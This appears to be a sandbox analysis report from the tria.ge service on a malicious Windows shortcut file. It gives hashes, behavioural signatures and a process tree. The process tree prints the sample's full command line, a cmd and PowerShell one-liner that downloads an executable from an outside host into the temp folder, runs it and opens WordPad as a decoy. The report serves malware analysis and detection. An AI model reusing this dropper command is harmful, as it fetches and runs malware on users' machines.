Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
02/02/2023, 13:36
Static task
static1
Behavioral task
behavioral1
Sample
43843_8439_8329098.lnk
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
43843_8439_8329098.lnk
Resource
win10v2004-20220812-en
General
-
Target
43843_8439_8329098.lnk
-
Size
130KB
-
MD5
2fcb95c29131b2bdb9f864f492a3bcd1
-
SHA1
7ffa77710ae6a95b3759643852a5a829c550a36e
-
SHA256
36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5
-
SHA512
a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7
-
SSDEEP
3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1960 powershell.exe 5 1960 powershell.exe 6 1960 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1960 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1564 wordpad.exe 1564 wordpad.exe 1564 wordpad.exe 1564 wordpad.exe 1564 wordpad.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1652 wrote to memory of 1748 1652 cmd.exe 29 PID 1652 wrote to memory of 1748 1652 cmd.exe 29 PID 1652 wrote to memory of 1748 1652 cmd.exe 29 PID 1748 wrote to memory of 1960 1748 cmd.exe 30 PID 1748 wrote to memory of 1960 1748 cmd.exe 30 PID 1748 wrote to memory of 1960 1748 cmd.exe 30 PID 1748 wrote to memory of 1564 1748 cmd.exe 31 PID 1748 wrote to memory of 1564 1748 cmd.exe 31 PID 1748 wrote to memory of 1564 1748 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Program Files\windows nt\accessories\wordpad.exe"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys3⤵
- Suspicious use of SetWindowsHookEx
PID:1564
-
-